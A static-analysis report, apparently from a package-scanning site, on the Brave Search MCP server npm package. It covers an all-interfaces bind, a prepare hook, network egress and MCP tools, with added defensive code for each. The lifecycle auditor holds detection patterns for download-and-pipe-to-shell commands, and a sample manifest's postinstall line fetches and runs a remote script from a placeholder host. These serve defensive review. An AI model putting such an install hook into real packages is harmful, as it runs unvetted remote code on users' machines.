SkillTotal

Is Brave Search MCP server safe?

@brave/brave-search-mcp-server is an AI npm package analyzed by SkillTotal's deterministic static scanner. The scan found no malicious indicators, though 4 risky constructs are reported for review. Its capabilities are install-time execution, an MCP tool surface and network egress; a capability describes what the code can do, not a verdict on intent. Risk score 10/100 (low).

@brave/brave-search-mcp-server 2.0.85

npm_package · https://github.com/brave/brave-search-mcp-server
LOW · 10 / 100 malicious-risk
Snapshot · scanned Jun 20, 2026 · @brave/brave-search-mcp-server@2.0.85 · engine 0.18.0 / ruleset 19
No malicious indicators - review capabilities before installing
Notable — review in context (capabilities are not malware):
  • Node.js network egress
  • npm prepare hook
  • Server bound to all network interfaces

No malicious indicators found by static analysis.

Capabilities — what this component can do (not a risk score):
install time execution · mcp tools detected · network egress

Findings (4)

MEDIUM · Server bound to all network interfaces · ST-EXPOSE-BIND

A server is bound to all network interfaces (0.0.0.0), not just your own machine.

host: '0.0.0.0',
process.env.BRAVE_MCP_HOST ?? '0.0.0.0'

Why it matters: Without authentication, other hosts on the network can reach it. This applies only when the server is run with a network (HTTP) transport; an MCP server spawned over stdio opens no listening socket.

Fix: Bind to 127.0.0.1 for local-only use, or require authentication and restrict access if remote exposure is intended.
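The weak default the scan quotes, beside a hardened replacement, as an added example that is not code from @brave/brave-search-mcp-server. BRAVE_MCP_HOST is the variable named in the finding; BRAVE_MCP_EXPOSE and BRAVE_MCP_AUTH_TOKEN are names assumed here for illustration. The hardened form defaults to loopback, refuses a non-loopback bind without an explicit opt-in plus a token, and gates each request on that token with a comparison that does not short-circuit.

```javascript
// Added example, not the project's code. BRAVE_MCP_EXPOSE and
// BRAVE_MCP_AUTH_TOKEN are assumed names; BRAVE_MCP_HOST is from the finding.

// Weak form, as reported by the scan: with the variable unset, the server
// listens on every interface.
function weakBindHost(env) {
  return env.BRAVE_MCP_HOST ?? '0.0.0.0';
}

// True only for addresses another host cannot reach. IPv4-mapped forms such
// as ::ffff:127.0.0.1 are deliberately not matched, so they fall through to
// the "needs opt-in and a token" path rather than being trusted by accident.
function isLoopback(host) {
  const h = String(host).trim().toLowerCase();
  if (h === 'localhost' || h === '::1' || h === '0:0:0:0:0:0:0:1') return true;
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(h);
  if (!m) return false;
  const octets = m.slice(1).map(Number);
  return octets.every((o) => o <= 255) && octets[0] === 127;
}

// Hardened form: loopback by default. Binding anything else requires an
// explicit opt-in and a bearer token long enough not to be guessable.
function resolveBindConfig(env) {
  const host = env.BRAVE_MCP_HOST ?? '127.0.0.1';
  if (isLoopback(host)) return { host, token: null };
  if (env.BRAVE_MCP_EXPOSE !== '1') {
    throw new Error(`refusing to bind ${host}: set BRAVE_MCP_EXPOSE=1 to expose the server beyond this host`);
  }
  const token = env.BRAVE_MCP_AUTH_TOKEN;
  if (typeof token !== 'string' || token.length < 32) {
    throw new Error('BRAVE_MCP_AUTH_TOKEN of at least 32 characters is required for a non-loopback bind');
  }
  return { host, token };
}

// Compare every byte instead of stopping at the first mismatch, so response
// time does not reveal how much of the token a remote caller got right.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Per-request gate for an HTTP transport: a loopback bind needs no token
// because nothing off-host can connect; an exposed bind must present it.
function authorize(cfg, headers) {
  if (cfg.token === null) return true;
  const presented = headers.authorization ?? '';
  return constantTimeEqual(presented, `Bearer ${cfg.token}`);
}
```

Wire `authorize` in front of the HTTP handler and pass `resolveBindConfig(process.env).host` to `listen`; with no environment set, the server is then unreachable from other hosts, and exposing it is a deliberate two-variable decision rather than the default.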

MEDIUM · npm prepare hook · ST-INSTALL-NPM-PREPARE

package.json has a 'prepare' script (runs on git/local installs and before publishing).

"prepare": "npm run format && npm run build",

Why it matters: Usually a build step. It does not run when the published tarball is installed from the registry as a dependency, but it does run on a local install in a clone and when the package is pulled in as a git dependency, so confirm it doesn't fetch or run remote code.

Fix: Usually a legitimate build step; confirm it only builds and does not fetch or execute remote code.
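One way to do that confirmation mechanically, as an added example that is neither the project's code nor SkillTotal's scanner: audit every npm lifecycle script in a package.json, following `npm run <name>` chains so a harmless-looking `prepare` is judged by what it ultimately executes. Both manifests below are constructed; the clean one reuses the `prepare` line quoted in the finding, and its `format` and `build` scripts are assumed.

```javascript
// Added example, not the project's code. The manifests are constructed;
// CLEAN_PKG.scripts.prepare is the line from the finding, the rest is assumed.

const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepare', 'prepublish', 'prepublishOnly', 'prepack', 'postpack',
];

// Patterns that mean "read this by hand before installing", not "malware".
const SUSPICIOUS = [
  { re: /\b(curl|wget)\b/i, why: 'downloads content at install time' },
  { re: /\|\s*(sh|bash|zsh)\b/, why: 'pipes data into a shell' },
  { re: /\bnode\s+(-e|--eval)\b/, why: 'evaluates inline JavaScript' },
  { re: /https?:\/\//i, why: 'references a remote URL' },
  { re: /\b(base64|eval)\b/i, why: 'decodes or evaluates an opaque payload' },
  { re: /\bnpx\b/, why: 'runs a package that may not be a declared dependency' },
];

// Expand `npm run x` / `npm run-script x` into the referenced script text,
// recursively, with a visited set so a cycle cannot recurse forever.
function expandScript(scripts, name, seen = new Set()) {
  if (seen.has(name) || typeof scripts[name] !== 'string') return '';
  seen.add(name);
  const body = scripts[name];
  const nested = [];
  const re = /\bnpm\s+(?:run|run-script)\s+([\w:.-]+)/g;
  let m;
  while ((m = re.exec(body)) !== null) nested.push(expandScript(scripts, m[1], seen));
  return [body, ...nested].join('\n');
}

// One entry per lifecycle hook present, with the reasons it was flagged.
// An empty flags array means "build-looking, nothing to chase".
function auditLifecycleScripts(pkg) {
  const scripts = pkg.scripts ?? {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => {
      const expanded = expandScript(scripts, hook);
      const flags = SUSPICIOUS.filter(({ re }) => re.test(expanded)).map(({ why }) => why);
      return { hook, script: scripts[hook], flags };
    });
}

// Constructed manifests for the demo.
const CLEAN_PKG = {
  name: 'clean-example',
  scripts: {
    prepare: 'npm run format && npm run build',
    format: 'prettier --write .',
    build: 'tsc -p tsconfig.json',
  },
};
const RISKY_PKG = {
  name: 'risky-example',
  scripts: {
    postinstall: 'npm run setup',
    setup: 'curl -fsSL https://updates.example.invalid/bootstrap.sh | sh',
  },
};
```

Run it over the manifest of the version you are about to install (or over `npm pack --dry-run` output for what will actually publish). Where a hook is flagged and you still need the package, `npm install --ignore-scripts` installs it without running any lifecycle script, at the cost of having to build it yourself.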

MEDIUM · Node.js network egress · ST-NET-NODE

The component makes outbound network requests.

const response = await fetch(urlWithParams, { headers });

Why it matters: Usually legitimate, but confirm the destinations are expected and no sensitive data leaves.

Fix: Confirm the destination hosts are expected and that no sensitive data is sent off-host.
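An egress gate to put in front of a `fetch(urlWithParams, { headers })` call like the one the scan points at, as an added example that is not the project's code. The allowlist entry `api.example.invalid` is a placeholder; replace it with the hosts the server is documented to call. The list of credential-looking query parameter names is a heuristic, included because a key that travels in the URL ends up in proxy and server logs even when the destination is right.

```javascript
// Added example, not the project's code. EGRESS_ALLOWLIST holds a
// placeholder host; SECRET_PARAM_NAMES is a heuristic, not a standard.

const EGRESS_ALLOWLIST = new Set(['api.example.invalid']);
const SECRET_PARAM_NAMES = /^(api[_-]?key|key|token|secret|password|auth)$/i;

// Pure policy check; returns { ok, reason } so the caller can log the reason
// without the request ever being attempted.
function checkEgress(urlString, allowlist = EGRESS_ALLOWLIST) {
  let url;
  try {
    url = new URL(urlString);
  } catch (e) {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (url.protocol !== 'https:') {
    return { ok: false, reason: `scheme ${url.protocol} is not https:` };
  }
  if (!allowlist.has(url.hostname)) {
    return { ok: false, reason: `host ${url.hostname} is not allowlisted` };
  }
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials embedded in URL' };
  }
  for (const name of url.searchParams.keys()) {
    if (SECRET_PARAM_NAMES.test(name)) {
      return { ok: false, reason: `secret-looking query parameter "${name}" (send it as a header)` };
    }
  }
  return { ok: true, host: url.hostname };
}

// Wrapper: refuses a disallowed destination before any bytes leave, and pins
// redirect handling to 'manual' so a 3xx from the allowlisted host cannot
// steer the request (and its headers) to a host that was never checked.
// fetchImpl is injectable so the policy can be exercised offline.
function guardedFetch(urlString, init = {}, fetchImpl = globalThis.fetch, allowlist = EGRESS_ALLOWLIST) {
  const verdict = checkEgress(urlString, allowlist);
  if (!verdict.ok) throw new Error(`egress blocked: ${verdict.reason}`);
  return fetchImpl(urlString, { ...init, redirect: 'manual' });
}
```

Route every outbound call through `guardedFetch` and log the `reason` on refusal; the log then doubles as an inventory of destinations, which is the "confirm the hosts are expected" step made checkable.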

LOW · MCP tool surface detected · ST-MCP-DETECTED

An MCP tool surface (manifest or tool definitions) was found.

Why it matters: Just context — review which tools it offers and their permissions.

Fix: Review the declared MCP tools and their permissions.


How we determine this: deterministic static analysis (regex + AST), evidence-anchored, with no code execution.